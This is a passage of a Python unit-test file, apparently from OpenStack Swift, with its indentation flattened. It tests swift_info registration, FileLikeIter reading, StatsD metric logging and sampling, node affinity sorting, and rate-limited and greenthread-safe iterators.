self.assertTrue('swift' in utils._swift_info)
self.assertTrue('foo' in utils._swift_info['swift'])
self.assertEqual(utils._swift_info['swift']['foo'], 'bar')
self.assertTrue('lorem' in utils._swift_info['swift'])
self.assertEqual(utils._swift_info['swift']['lorem'], 'ipsum')
self.assertTrue('cap1' in utils._swift_info)
self.assertTrue('cap1_foo' in utils._swift_info['cap1'])
self.assertEqual(utils._swift_info['cap1']['cap1_foo'], 'cap1_bar')
self.assertTrue('cap1_lorem' in utils._swift_info['cap1'])
self.assertEqual(utils._swift_info['cap1']['cap1_lorem'], 'cap1_ipsum')
self.assertRaises(ValueError,
utils.register_swift_info, 'admin', foo='bar')
self.assertRaises(ValueError,
utils.register_swift_info, 'disallowed_sections',
disallowed_sections=None)
utils.register_swift_info('goodkey', foo='5.6')
self.assertRaises(ValueError,
utils.register_swift_info, 'bad.key', foo='5.6')
data = {'bad.key': '5.6'}
self.assertRaises(ValueError,
utils.register_swift_info, 'goodkey', **data)
def test_get_swift_info(self):
utils._swift_info = {'swift': {'foo': 'bar'},
'cap1': {'cap1_foo': 'cap1_bar'}}
utils._swift_admin_info = {'admin_cap1': {'ac1_foo': 'ac1_bar'}}
info = utils.get_swift_info()
self.assertTrue('admin' not in info)
self.assertTrue('swift' in info)
self.assertTrue('foo' in info['swift'])
self.assertEqual(utils._swift_info['swift']['foo'], 'bar')
self.assertTrue('cap1' in info)
self.assertTrue('cap1_foo' in info['cap1'])
self.assertEqual(utils._swift_info['cap1']['cap1_foo'], 'cap1_bar')
def test_get_swift_info_with_disallowed_sections(self):
utils._swift_info = {'swift': {'foo': 'bar'},
'cap1': {'cap1_foo': 'cap1_bar'},
'cap2': {'cap2_foo': 'cap2_bar'},
'cap3': {'cap3_foo': 'cap3_bar'}}
utils._swift_admin_info = {'admin_cap1': {'ac1_foo': 'ac1_bar'}}
info = utils.get_swift_info(disallowed_sections=['cap1', 'cap3'])
self.assertTrue('admin' not in info)
self.assertTrue('swift' in info)
self.assertTrue('foo' in info['swift'])
self.assertEqual(info['swift']['foo'], 'bar')
self.assertTrue('cap1' not in info)
self.assertTrue('cap2' in info)
self.assertTrue('cap2_foo' in info['cap2'])
self.assertEqual(info['cap2']['cap2_foo'], 'cap2_bar')
self.assertTrue('cap3' not in info)
def test_register_swift_admin_info(self):
utils.register_swift_info(admin=True, admin_foo='admin_bar')
utils.register_swift_info(admin=True, admin_lorem='admin_ipsum')
utils.register_swift_info('cap1', admin=True, ac1_foo='ac1_bar')
utils.register_swift_info('cap1', admin=True, ac1_lorem='ac1_ipsum')
self.assertTrue('swift' in utils._swift_admin_info)
self.assertTrue('admin_foo' in utils._swift_admin_info['swift'])
self.assertEqual(
utils._swift_admin_info['swift']['admin_foo'], 'admin_bar')
self.assertTrue('admin_lorem' in utils._swift_admin_info['swift'])
self.assertEqual(
utils._swift_admin_info['swift']['admin_lorem'], 'admin_ipsum')
self.assertTrue('cap1' in utils._swift_admin_info)
self.assertTrue('ac1_foo' in utils._swift_admin_info['cap1'])
self.assertEqual(
utils._swift_admin_info['cap1']['ac1_foo'], 'ac1_bar')
self.assertTrue('ac1_lorem' in utils._swift_admin_info['cap1'])
self.assertEqual(
utils._swift_admin_info['cap1']['ac1_lorem'], 'ac1_ipsum')
self.assertTrue('swift' not in utils._swift_info)
self.assertTrue('cap1' not in utils._swift_info)
def test_get_swift_admin_info(self):
utils._swift_info = {'swift': {'foo': 'bar'},
'cap1': {'cap1_foo': 'cap1_bar'}}
utils._swift_admin_info = {'admin_cap1': {'ac1_foo': 'ac1_bar'}}
info = utils.get_swift_info(admin=True)
self.assertTrue('admin' in info)
self.assertTrue('admin_cap1' in info['admin'])
self.assertTrue('ac1_foo' in info['admin']['admin_cap1'])
self.assertEqual(info['admin']['admin_cap1']['ac1_foo'], 'ac1_bar')
self.assertTrue('swift' in info)
self.assertTrue('foo' in info['swift'])
self.assertEqual(utils._swift_info['swift']['foo'], 'bar')
self.assertTrue('cap1' in info)
self.assertTrue('cap1_foo' in info['cap1'])
self.assertEqual(utils._swift_info['cap1']['cap1_foo'], 'cap1_bar')
def test_get_swift_admin_info_with_disallowed_sections(self):
utils._swift_info = {'swift': {'foo': 'bar'},
'cap1': {'cap1_foo': 'cap1_bar'},
'cap2': {'cap2_foo': 'cap2_bar'},
'cap3': {'cap3_foo': 'cap3_bar'}}
utils._swift_admin_info = {'admin_cap1': {'ac1_foo': 'ac1_bar'}}
info = utils.get_swift_info(
admin=True, disallowed_sections=['cap1', 'cap3'])
self.assertTrue('admin' in info)
self.assertTrue('admin_cap1' in info['admin'])
self.assertTrue('ac1_foo' in info['admin']['admin_cap1'])
self.assertEqual(info['admin']['admin_cap1']['ac1_foo'], 'ac1_bar')
self.assertTrue('disallowed_sections' in info['admin'])
self.assertTrue('cap1' in info['admin']['disallowed_sections'])
self.assertTrue('cap2' not in info['admin']['disallowed_sections'])
self.assertTrue('cap3' in info['admin']['disallowed_sections'])
self.assertTrue('swift' in info)
self.assertTrue('foo' in info['swift'])
self.assertEqual(info['swift']['foo'], 'bar')
self.assertTrue('cap1' not in info)
self.assertTrue('cap2' in info)
self.assertTrue('cap2_foo' in info['cap2'])
self.assertEqual(info['cap2']['cap2_foo'], 'cap2_bar')
self.assertTrue('cap3' not in info)
def test_get_swift_admin_info_with_disallowed_sub_sections(self):
utils._swift_info = {'swift': {'foo': 'bar'},
'cap1': {'cap1_foo': 'cap1_bar',
'cap1_moo': 'cap1_baa'},
'cap2': {'cap2_foo': 'cap2_bar'},
'cap3': {'cap2_foo': 'cap2_bar'},
'cap4': {'a': {'b': {'c': 'c'},
'b.c': 'b.c'}}}
utils._swift_admin_info = {'admin_cap1': {'ac1_foo': 'ac1_bar'}}
info = utils.get_swift_info(
admin=True, disallowed_sections=['cap1.cap1_foo', 'cap3',
'cap4.a.b.c'])
self.assertTrue('cap3' not in info)
self.assertEqual(info['cap1']['cap1_moo'], 'cap1_baa')
self.assertTrue('cap1_foo' not in info['cap1'])
self.assertTrue('c' not in info['cap4']['a']['b'])
self.assertEqual(info['cap4']['a']['b.c'], 'b.c')
def test_get_swift_info_with_unmatched_disallowed_sections(self):
cap1 = {'cap1_foo': 'cap1_bar',
'cap1_moo': 'cap1_baa'}
utils._swift_info = {'swift': {'foo': 'bar'},
'cap1': cap1}
# expect no exceptions
info = utils.get_swift_info(
disallowed_sections=['cap2.cap1_foo', 'cap1.no_match',
'cap1.cap1_foo.no_match.no_match'])
self.assertEqual(info['cap1'], cap1)
class TestFileLikeIter(unittest.TestCase):
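    # FileLikeIter wraps an iterable of strings in a read-only file-like
    # API: iteration yields the raw chunks, while read/readline/readlines
    # re-chunk the data and honor optional size arguments; after close(),
    # further reads raise ValueError.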
def test_iter_file_iter(self):
in_iter = ['abc', 'de', 'fghijk', 'l']
chunks = []
for chunk in utils.FileLikeIter(in_iter):
chunks.append(chunk)
self.assertEqual(chunks, in_iter)
def test_next(self):
in_iter = ['abc', 'de', 'fghijk', 'l']
chunks = []
iter_file = utils.FileLikeIter(in_iter)
while True:
try:
chunk = next(iter_file)
except StopIteration:
break
chunks.append(chunk)
self.assertEqual(chunks, in_iter)
def test_read(self):
in_iter = ['abc', 'de', 'fghijk', 'l']
iter_file = utils.FileLikeIter(in_iter)
self.assertEqual(iter_file.read(), ''.join(in_iter))
def test_read_with_size(self):
in_iter = ['abc', 'de', 'fghijk', 'l']
chunks = []
iter_file = utils.FileLikeIter(in_iter)
while True:
chunk = iter_file.read(2)
if not chunk:
break
self.assertTrue(len(chunk) <= 2)
chunks.append(chunk)
self.assertEqual(''.join(chunks), ''.join(in_iter))
def test_read_with_size_zero(self):
# makes little sense, but file supports it, so...
self.assertEqual(utils.FileLikeIter('abc').read(0), '')
def test_readline(self):
in_iter = ['abc\n', 'd', '\nef', 'g\nh', '\nij\n\nk\n', 'trailing.']
lines = []
iter_file = utils.FileLikeIter(in_iter)
while True:
line = iter_file.readline()
if not line:
break
lines.append(line)
self.assertEqual(
lines,
[v if v == 'trailing.' else v + '\n'
for v in ''.join(in_iter).split('\n')])
def test_readline2(self):
self.assertEqual(
utils.FileLikeIter(['abc', 'def\n']).readline(4),
'abcd')
def test_readline3(self):
self.assertEqual(
utils.FileLikeIter(['a' * 1111, 'bc\ndef']).readline(),
('a' * 1111) + 'bc\n')
def test_readline_with_size(self):
in_iter = ['abc\n', 'd', '\nef', 'g\nh', '\nij\n\nk\n', 'trailing.']
lines = []
iter_file = utils.FileLikeIter(in_iter)
while True:
line = iter_file.readline(2)
if not line:
break
lines.append(line)
self.assertEqual(
lines,
['ab', 'c\n', 'd\n', 'ef', 'g\n', 'h\n', 'ij', '\n', '\n', 'k\n',
'tr', 'ai', 'li', 'ng', '.'])
def test_readlines(self):
in_iter = ['abc\n', 'd', '\nef', 'g\nh', '\nij\n\nk\n', 'trailing.']
lines = utils.FileLikeIter(in_iter).readlines()
self.assertEqual(
lines,
[v if v == 'trailing.' else v + '\n'
for v in ''.join(in_iter).split('\n')])
def test_readlines_with_size(self):
in_iter = ['abc\n', 'd', '\nef', 'g\nh', '\nij\n\nk\n', 'trailing.']
iter_file = utils.FileLikeIter(in_iter)
lists_of_lines = []
while True:
lines = iter_file.readlines(2)
if not lines:
break
lists_of_lines.append(lines)
self.assertEqual(
lists_of_lines,
[['ab'], ['c\n'], ['d\n'], ['ef'], ['g\n'], ['h\n'], ['ij'],
['\n', '\n'], ['k\n'], ['tr'], ['ai'], ['li'], ['ng'], ['.']])
def test_close(self):
iter_file = utils.FileLikeIter('abcdef')
self.assertEqual(next(iter_file), 'a')
iter_file.close()
self.assertTrue(iter_file.closed)
self.assertRaises(ValueError, iter_file.next)
self.assertRaises(ValueError, iter_file.read)
self.assertRaises(ValueError, iter_file.readline)
self.assertRaises(ValueError, iter_file.readlines)
# Just make sure repeated close calls don't raise an Exception
iter_file.close()
self.assertTrue(iter_file.closed)
class TestStatsdLogging(unittest.TestCase):
def test_get_logger_statsd_client_not_specified(self):
logger = utils.get_logger({}, 'some-name', log_route='some-route')
# white-box construction validation
self.assertEqual(None, logger.logger.statsd_client)
def test_get_logger_statsd_client_defaults(self):
logger = utils.get_logger({'log_statsd_host': 'some.host.com'},
'some-name', log_route='some-route')
# white-box construction validation
self.assertTrue(isinstance(logger.logger.statsd_client,
utils.StatsdClient))
self.assertEqual(logger.logger.statsd_client._host, 'some.host.com')
self.assertEqual(logger.logger.statsd_client._port, 8125)
self.assertEqual(logger.logger.statsd_client._prefix, 'some-name.')
self.assertEqual(logger.logger.statsd_client._default_sample_rate, 1)
logger.set_statsd_prefix('some-name.more-specific')
self.assertEqual(logger.logger.statsd_client._prefix,
'some-name.more-specific.')
logger.set_statsd_prefix('')
self.assertEqual(logger.logger.statsd_client._prefix, '')
def test_get_logger_statsd_client_non_defaults(self):
logger = utils.get_logger({
'log_statsd_host': 'another.host.com',
'log_statsd_port': '9876',
'log_statsd_default_sample_rate': '0.75',
'log_statsd_sample_rate_factor': '0.81',
'log_statsd_metric_prefix': 'tomato.sauce',
}, 'some-name', log_route='some-route')
self.assertEqual(logger.logger.statsd_client._prefix,
'tomato.sauce.some-name.')
logger.set_statsd_prefix('some-name.more-specific')
self.assertEqual(logger.logger.statsd_client._prefix,
'tomato.sauce.some-name.more-specific.')
logger.set_statsd_prefix('')
self.assertEqual(logger.logger.statsd_client._prefix, 'tomato.sauce.')
self.assertEqual(logger.logger.statsd_client._host, 'another.host.com')
self.assertEqual(logger.logger.statsd_client._port, 9876)
self.assertEqual(logger.logger.statsd_client._default_sample_rate,
0.75)
self.assertEqual(logger.logger.statsd_client._sample_rate_factor,
0.81)
def test_no_exception_when_cant_send_udp_packet(self):
logger = utils.get_logger({'log_statsd_host': 'some.host.com'})
statsd_client = logger.logger.statsd_client
fl = FakeLogger()
statsd_client.logger = fl
mock_socket = MockUdpSocket(sendto_errno=errno.EPERM)
statsd_client._open_socket = lambda *_: mock_socket
logger.increment('tunafish')
expected = ["Error sending UDP message to ('some.host.com', 8125): "
"[Errno 1] test errno 1"]
self.assertEqual(fl.get_lines_for_level('warning'), expected)
def test_sample_rates(self):
logger = utils.get_logger({'log_statsd_host': 'some.host.com'})
mock_socket = MockUdpSocket()
# encapsulation? what's that?
statsd_client = logger.logger.statsd_client
self.assertTrue(statsd_client.random is random.random)
statsd_client._open_socket = lambda *_: mock_socket
statsd_client.random = lambda: 0.50001
logger.increment('tribbles', sample_rate=0.5)
self.assertEqual(len(mock_socket.sent), 0)
statsd_client.random = lambda: 0.49999
logger.increment('tribbles', sample_rate=0.5)
self.assertEqual(len(mock_socket.sent), 1)
payload = mock_socket.sent[0][0]
self.assertTrue(payload.endswith("|@0.5"))
def test_sample_rates_with_sample_rate_factor(self):
logger = utils.get_logger({
'log_statsd_host': 'some.host.com',
'log_statsd_default_sample_rate': '0.82',
'log_statsd_sample_rate_factor': '0.91',
})
effective_sample_rate = 0.82 * 0.91
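        # A sample is sent only when statsd_client.random() returns a value
        # below the effective rate (default sample rate * rate factor), and
        # that rate is appended to the payload as an "|@<rate>" suffix.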
mock_socket = MockUdpSocket()
# encapsulation? what's that?
statsd_client = logger.logger.statsd_client
self.assertTrue(statsd_client.random is random.random)
statsd_client._open_socket = lambda *_: mock_socket
statsd_client.random = lambda: effective_sample_rate + 0.001
logger.increment('tribbles')
self.assertEqual(len(mock_socket.sent), 0)
statsd_client.random = lambda: effective_sample_rate - 0.001
logger.increment('tribbles')
self.assertEqual(len(mock_socket.sent), 1)
payload = mock_socket.sent[0][0]
self.assertTrue(payload.endswith("|@%s" % effective_sample_rate),
payload)
effective_sample_rate = 0.587 * 0.91
statsd_client.random = lambda: effective_sample_rate - 0.001
logger.increment('tribbles', sample_rate=0.587)
self.assertEqual(len(mock_socket.sent), 2)
payload = mock_socket.sent[1][0]
self.assertTrue(payload.endswith("|@%s" % effective_sample_rate),
payload)
def test_timing_stats(self):
class MockController(object):
def __init__(self, status):
self.status = status
self.logger = self
self.args = ()
self.called = 'UNKNOWN'
def timing_since(self, *args):
self.called = 'timing'
self.args = args
@utils.timing_stats()
def METHOD(controller):
return Response(status=controller.status)
mock_controller = MockController(200)
METHOD(mock_controller)
self.assertEqual(mock_controller.called, 'timing')
self.assertEqual(len(mock_controller.args), 2)
self.assertEqual(mock_controller.args[0], 'METHOD.timing')
self.assertTrue(mock_controller.args[1] > 0)
mock_controller = MockController(404)
METHOD(mock_controller)
self.assertEqual(len(mock_controller.args), 2)
self.assertEqual(mock_controller.called, 'timing')
self.assertEqual(mock_controller.args[0], 'METHOD.timing')
self.assertTrue(mock_controller.args[1] > 0)
mock_controller = MockController(412)
METHOD(mock_controller)
self.assertEqual(len(mock_controller.args), 2)
self.assertEqual(mock_controller.called, 'timing')
self.assertEqual(mock_controller.args[0], 'METHOD.timing')
self.assertTrue(mock_controller.args[1] > 0)
mock_controller = MockController(416)
METHOD(mock_controller)
self.assertEqual(len(mock_controller.args), 2)
self.assertEqual(mock_controller.called, 'timing')
self.assertEqual(mock_controller.args[0], 'METHOD.timing')
self.assertTrue(mock_controller.args[1] > 0)
mock_controller = MockController(401)
METHOD(mock_controller)
self.assertEqual(len(mock_controller.args), 2)
self.assertEqual(mock_controller.called, 'timing')
self.assertEqual(mock_controller.args[0], 'METHOD.errors.timing')
self.assertTrue(mock_controller.args[1] > 0)
class UnsafeXrange(object):
"""
Like xrange(limit), but with extra context switching to screw things up.
"""
def __init__(self, upper_bound):
self.current = 0
self.concurrent_calls = 0
self.upper_bound = upper_bound
self.concurrent_call = False
def __iter__(self):
return self
def next(self):
if self.concurrent_calls > 0:
self.concurrent_call = True
self.concurrent_calls += 1
try:
if self.current >= self.upper_bound:
raise StopIteration
else:
val = self.current
self.current += 1
eventlet.sleep() # yield control
return val
finally:
self.concurrent_calls -= 1
class TestAffinityKeyFunction(unittest.TestCase):
def setUp(self):
self.nodes = [dict(id=0, region=1, zone=1),
dict(id=1, region=1, zone=2),
dict(id=2, region=2, zone=1),
dict(id=3, region=2, zone=2),
dict(id=4, region=3, zone=1),
dict(id=5, region=3, zone=2),
dict(id=6, region=4, zone=0),
dict(id=7, region=4, zone=1)]
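    # affinity_key_function turns a spec like "r1=100, r4=200, r3z1=1" into
    # a sort key: nodes matching a region/zone term get that term's numeric
    # priority (lower sorts first); everything else keeps its original
    # relative order after them.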
def test_single_region(self):
keyfn = utils.affinity_key_function("r3=1")
ids = [n['id'] for n in sorted(self.nodes, key=keyfn)]
self.assertEqual([4, 5, 0, 1, 2, 3, 6, 7], ids)
def test_bogus_value(self):
self.assertRaises(ValueError,
utils.affinity_key_function, "r3")
self.assertRaises(ValueError,
utils.affinity_key_function, "r3=elephant")
def test_empty_value(self):
# Empty's okay, it just means no preference
keyfn = utils.affinity_key_function("")
self.assertTrue(callable(keyfn))
ids = [n['id'] for n in sorted(self.nodes, key=keyfn)]
self.assertEqual([0, 1, 2, 3, 4, 5, 6, 7], ids)
def test_all_whitespace_value(self):
# Empty's okay, it just means no preference
keyfn = utils.affinity_key_function(" \n")
self.assertTrue(callable(keyfn))
ids = [n['id'] for n in sorted(self.nodes, key=keyfn)]
self.assertEqual([0, 1, 2, 3, 4, 5, 6, 7], ids)
def test_with_zone_zero(self):
keyfn = utils.affinity_key_function("r4z0=1")
ids = [n['id'] for n in sorted(self.nodes, key=keyfn)]
self.assertEqual([6, 0, 1, 2, 3, 4, 5, 7], ids)
def test_multiple(self):
keyfn = utils.affinity_key_function("r1=100, r4=200, r3z1=1")
ids = [n['id'] for n in sorted(self.nodes, key=keyfn)]
self.assertEqual([4, 0, 1, 6, 7, 2, 3, 5], ids)
def test_more_specific_after_less_specific(self):
keyfn = utils.affinity_key_function("r2=100, r2z2=50")
ids = [n['id'] for n in sorted(self.nodes, key=keyfn)]
self.assertEqual([3, 2, 0, 1, 4, 5, 6, 7], ids)
class TestAffinityLocalityPredicate(unittest.TestCase):
def setUp(self):
self.nodes = [dict(id=0, region=1, zone=1),
dict(id=1, region=1, zone=2),
dict(id=2, region=2, zone=1),
dict(id=3, region=2, zone=2),
dict(id=4, region=3, zone=1),
dict(id=5, region=3, zone=2),
dict(id=6, region=4, zone=0),
dict(id=7, region=4, zone=1)]
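    # affinity_locality_predicate returns a callable that is True for nodes
    # in any of the listed regions/zones; an empty spec means no preference
    # and yields None, and malformed specs raise ValueError.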
def test_empty(self):
pred = utils.affinity_locality_predicate('')
self.assertTrue(pred is None)
def test_region(self):
pred = utils.affinity_locality_predicate('r1')
self.assertTrue(callable(pred))
ids = [n['id'] for n in self.nodes if pred(n)]
self.assertEqual([0, 1], ids)
def test_zone(self):
pred = utils.affinity_locality_predicate('r1z1')
self.assertTrue(callable(pred))
ids = [n['id'] for n in self.nodes if pred(n)]
self.assertEqual([0], ids)
def test_multiple(self):
pred = utils.affinity_locality_predicate('r1, r3, r4z0')
self.assertTrue(callable(pred))
ids = [n['id'] for n in self.nodes if pred(n)]
self.assertEqual([0, 1, 4, 5, 6], ids)
def test_invalid(self):
self.assertRaises(ValueError,
utils.affinity_locality_predicate, 'falafel')
self.assertRaises(ValueError,
utils.affinity_locality_predicate, 'r8zQ')
self.assertRaises(ValueError,
utils.affinity_locality_predicate, 'r2d2')
self.assertRaises(ValueError,
utils.affinity_locality_predicate, 'r1z1=1')
class TestRateLimitedIterator(unittest.TestCase):
def run_under_pseudo_time(
self, func, *args, **kwargs):
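        # Run func under a fake clock: every time.time() call advances the
        # clock by 1 ms and eventlet.sleep() advances it by the requested
        # duration, so the "run for 0.1 s" loops in the tests below finish
        # instantly and deterministically.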
curr_time = [42.0]
def my_time():
curr_time[0] += 0.001
return curr_time[0]
def my_sleep(duration):
curr_time[0] += 0.001
curr_time[0] += duration
with patch('time.time', my_time), \
patch('eventlet.sleep', my_sleep):
return func(*args, **kwargs)
def test_rate_limiting(self):
def testfunc():
limited_iterator = utils.RateLimitedIterator(range(9999), 100)
got = []
started_at = time.time()
try:
while time.time() - started_at < 0.1:
got.append(next(limited_iterator))
except StopIteration:
pass
return got
got = self.run_under_pseudo_time(testfunc)
# it's 11, not 10, because ratelimiting doesn't apply to the very
# first element.
self.assertEqual(len(got), 11)
def test_limit_after(self):
def testfunc():
limited_iterator = utils.RateLimitedIterator(
range(9999), 100, limit_after=5)
got = []
started_at = time.time()
try:
while time.time() - started_at < 0.1:
got.append(next(limited_iterator))
except StopIteration:
pass
return got
got = self.run_under_pseudo_time(testfunc)
# it's 16, not 15, because ratelimiting doesn't apply to the very
# first element.
self.assertEqual(len(got), 16)
class TestGreenthreadSafeIterator(unittest.TestCase):
def increment(self, iterable):
plus_ones = []
for n in iterable:
plus_ones.append(n + 1)
return plus_ones
def test_setup_works(self):
# it should work without concurrent access
self.assertEqual([0, 1, 2, 3], list(UnsafeXrange(4)))
iterable = UnsafeXrange(10)
pile = eventlet.GreenPile(2)
for _ in range(2):
pile.spawn(self.increment, iterable)
        [resp for resp in pile]  # drain the pile; the results don't matter
self.assertTrue(
iterable.concurrent_call, 'test setup is insufficiently crazy')
def test_access_is_serialized(self):
pile = eventlet.GreenPile(2)
unsafe_iterable = UnsafeXrange(10)
iterable = utils.GreenthreadSafeIterator(unsafe_iterable)
for _ in range(2):
pile.spawn(self.increment, iterable)
response = sorted(sum([resp for resp in pile], []))
self.assertEqual(list(range(1, 11)), response)
self.assertTrue(
not unsafe_iterable.concurrent_call, 'concurrent call occurred')
class TestStatsdLoggingDelegation(unittest.TestCase):
def setUp(self):
self.sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.sock.bind(('localhost', 0))
self.port = self.sock.getsockname()[1]
self.queue = Queue()
self.reader_thread = threading.Thread(target=self.statsd_reader)
self.reader_thread.setDaemon(1)
self.reader_thread.start()
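    # setUp binds a real UDP socket to an ephemeral localhost port and has a
    # reader thread push every received datagram onto a queue, so the
    # assertStat/assertStatMatches helpers can check the exact StatsD wire
    # format (e.g. "prefix.metric:1|c|@0.5") produced by the logger.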
def tearDown(self):
# The "no-op when disabled" test doesn't set up a real logger, so
# create one here so we can tell the reader thread to stop.
if not getattr(self, 'logger', None):
self.logger = utils.get_logger({
'log_statsd_host': 'localhost',
'log_statsd_port': str(self.port),
}, 'some-name')
self.logger.increment('STOP')
self.reader_thread.join(timeout=4)
self.sock.close()
del self.logger
def statsd_reader(self):
while True:
try:
payload = self.sock.recv(4096)
if payload and 'STOP' in payload:
return 42
self.queue.put(payload)
except Exception as e:
sys.stderr.write('statsd_reader thread: %r' % (e,))
break
def _send_and_get(self, sender_fn, *args, **kwargs):
"""
Because the client library may not actually send a packet with
sample_rate < 1, we keep trying until we get one through.
"""
got = None
while not got:
sender_fn(*args, **kwargs)
try:
got = self.queue.get(timeout=0.5)
except Empty:
pass
return got
def assertStat(self, expected, sender_fn, *args, **kwargs):
got = self._send_and_get(sender_fn, *args, **kwargs)
return self.assertEqual(expected, got)
def assertStatMatches(self, expected_regexp, sender_fn, *args, **kwargs):
got = self._send_and_get(sender_fn, *args, **kwargs)
return self.assertTrue(re.search(expected_regexp, got),
[got, expected_regexp])
def test_methods_are_no_ops_when_not_enabled(self):
logger = utils.get_logger({
# No "log_statsd_host" means "disabled"
'log_statsd_port': str(self.port),
}, 'some-name')
# Delegate methods are no-ops
self.assertEqual(None, logger.update_stats('foo', 88))
self.assertEqual(None, logger.update_stats('foo', 88, 0.57))
self.assertEqual(None, logger.update_stats('foo', 88,
sample_rate=0.61))
self.assertEqual(None, logger.increment('foo'))
self.assertEqual(None, logger.increment('foo', 0.57))
self.assertEqual(None, logger.increment('foo', sample_rate=0.61))
self.assertEqual(None, logger.decrement('foo'))
self.assertEqual(None, logger.decrement('foo', 0.57))
self.assertEqual(None, logger.decrement('foo', sample_rate=0.61))
self.assertEqual(None, logger.timing('foo', 88.048))
self.assertEqual(None, logger.timing('foo', 88.57, 0.34))
self.assertEqual(None, logger.timing('foo', 88.998, sample_rate=0.82))
self.assertEqual(None, logger.timing_since('foo', 8938))
self.assertEqual(None, logger.timing_since('foo', 8948, 0.57))
self.assertEqual(None, logger.timing_since('foo', 849398,
sample_rate=0.61))
# Now, the queue should be empty (no UDP packets sent)
self.assertRaises(Empty, self.queue.get_nowait)
def test_delegate_methods_with_no_default_sample_rate(self):
self.logger = utils.get_logger({
'log_statsd_host': 'localhost',
'log_statsd_port': str(self.port),
}, 'some-name')
self.assertStat('some-name.some.counter:1|c', self.logger.increment,
'some.counter')
self.assertStat('some-name.some.counter:-1|c', self.logger.decrement,
'some.counter')
self.assertStat('some-name.some.operation:4900.0|ms',
self.logger.timing, 'some.operation', 4.9 * 1000)
self.assertStatMatches('some-name\.another\.operation:\d+\.\d+\|ms',
self.logger.timing_since, 'another.operation',
time.time())
self.assertStat('some-name.another.counter:42|c',
self.logger.update_stats, 'another.counter', 42)
# Each call can override the sample_rate (also, bonus prefix test)
self.logger.set_statsd_prefix('pfx')
self.assertStat('pfx.some.counter:1|c|@0.972', self.logger.increment,
'some.counter', sample_rate=0.972)
self.assertStat('pfx.some.counter:-1|c|@0.972', self.logger.decrement,
'some.counter', sample_rate=0.972)
self.assertStat('pfx.some.operation:4900.0|ms|@0.972',
self.logger.timing, 'some.operation', 4.9 * 1000,
sample_rate=0.972)
        self.assertStatMatches('pfx\.another\.op:\d+\.\d+\|ms\|@0\.972',
self.logger.timing_since, 'another.op',
time.time(), sample_rate=0.972)
self.assertStat('pfx.another.counter:3|c|@0.972',
self.logger.update_stats, 'another.counter', 3,
sample_rate=0.972)
# Can override sample_rate with non-keyword arg
self.logger.set_statsd_prefix('')
self.assertStat('some.counter:1|c|@0.939', self.logger.increment,
'some.counter', 0.939)
self.assertStat('some.counter:-1|c|@0.939', self.logger.decrement,
'some.counter', 0.939)
self.assertStat('some.operation:4900.0|ms|@0.939',
self.logger.timing, 'some.operation',
4.9 * 1000, 0.939)
        self.assertStatMatches('another\.op:\d+\.\d+\|ms\|@0\.939',
self.logger.timing_since, 'another.op',
time.time(), 0.939)
self.assertStat('another.counter:3|c|@0.939',
self.logger.update_stats, 'another.counter', 3, 0.939)
def test_delegate_methods_with_default_sample_rate(self):
self.logger = utils.get_logger({
'log_statsd_host': 'localhost',
'log_statsd_port': str(self.port),
'log_statsd_default_sample_rate': '0.93',
}, 'pfx')
self.assertStat('pfx.some.counter:1|c|@0.93', self.logger.increment,
'some.counter')
self.assertStat('pfx.some.counter:-1|c|@0.93', self.logger.decrement,
'some.counter')
self.assertStat('pfx.some.operation:4760.0|ms|@0.93',
self.logger.timing, 'some.operation', 4.76 * 1000)
        self.assertStatMatches('pfx\.another\.op:\d+\.\d+\|ms\|@0\.93',
self.logger.timing_since, 'another.op',
time.time())
self.assertStat('pfx.another.counter:3|c|@0.93',
self.logger.update_stats, 'another.counter', 3)
# Each call can override the sample_rate
self.assertStat('pfx.some.counter:1|c|@0.9912', self.logger.increment,
'some.counter', sample_rate=0.9912)
self.assertStat('pfx.some.counter:-1|c|@0.9912', self.logger.decrement,
'some.counter', sample_rate=0.9912)
self.assertStat('pfx.some.operation:4900.0|ms|@0.9912',
self.logger.timing, 'some.operation', 4.9 * 1000,
sample_rate=0.9912)
        self.assertStatMatches('pfx\.another\.op:\d+\.\d+\|ms\|@0\.9912',
self.logger.timing_since, 'another.op',
time.time(), sample_rate=0.9912)
self.assertStat('pfx.another.counter:3|c|@0.9912',
self.logger.update_stats, 'another.counter', 3,
sample_rate=0.9912)
# Can override sample_rate with non-keyword arg
self.logger.set_statsd_prefix('')
self.assertStat('some.counter:1|c|@0.987654', self.logger.increment,
'some.counter', 0.987654)
self.assertStat('some.counter:-1|c|@0.987654', self.logger.decrement,
'some.counter', 0.987654)
self.assertStat('some.operation:4900.0|ms|@0.987654',
self.logger.timing, 'some.operation',
4.9 * 1000, 0.987654)
        self.assertStatMatches('another\.op:\d+\.\d+\|ms\|@0\.987654',
self.logger.timing_since, 'another.op',
time.time(), 0.987654)
self.assertStat('another.counter:3|c|@0.987654',
self.logger.update_stats, 'another.counter',
3, 0.987654)
def test_delegate_methods_with_metric_prefix(self):
self.logger = utils.get_logger({
'log_statsd_host': 'localhost',
'log_statsd_port': str(self.port),
'log_statsd_metric_prefix': 'alpha.beta',
}, 'pfx')
self.assertStat('alpha.beta.pfx.some.counter:1|c',
self.logger.increment, 'some.counter')
self.assertStat('alpha.beta.pfx.some.counter:-1|c',
self.logger.decrement, 'some.counter')
self.assertStat('alpha.beta.pfx.some.operation:4760.0|ms',
self.logger.timing, 'some.operation', 4.76 * 1000)
self.assertStatMatches(
'alpha\.beta\.pfx\.another\.op:\d+\.\d+\|ms',
self.logger.timing_since, 'another.op', time.time())
self.assertStat('alpha.beta.pfx.another.counter:3|c',
self.logger.update_stats, 'another.counter', 3)
self.logger.set_statsd_prefix('')
self.assertStat('alpha.beta.some.counter:1|c|@0.9912',
self.logger.increment, 'some.counter',
sample_rate=0.9912)
self.assertStat('alpha.beta.some.counter:-1|c|@0.9912',
self.logger.decrement, 'some.counter', 0.9912)
self.assertStat('alpha.beta.some.operation:4900.0|ms|@0.9912',
self.logger.timing, 'some.operation', 4.9 * 1000,
sample_rate=0.9912)
        self.assertStatMatches('alpha\.beta\.another\.op:\d+\.\d+\|ms\|@0\.9912',
self.logger.timing_since, 'another.op',
time.time(), sample_rate=0.9912)
self.assertStat('alpha.beta.another.counter:3|c|@0.9912',
self.logger.update_stats, 'another.counter', 3,
sample_rate=0.9912)
def test_get_valid_utf8_str(self):
unicode_sample = u'\uc77c\uc601'
valid_utf8_str = unicode_sample.encode('utf-8')
invalid_utf8_str = unicode_sample.encode('utf-8')[::-1]
self.assertEqual(valid_utf8_str,
utils.get_valid_utf8_str(valid_utf8_str))
self.assertEqual(valid_utf8_str,
utils.get_valid_utf8_str(unicode_sample))
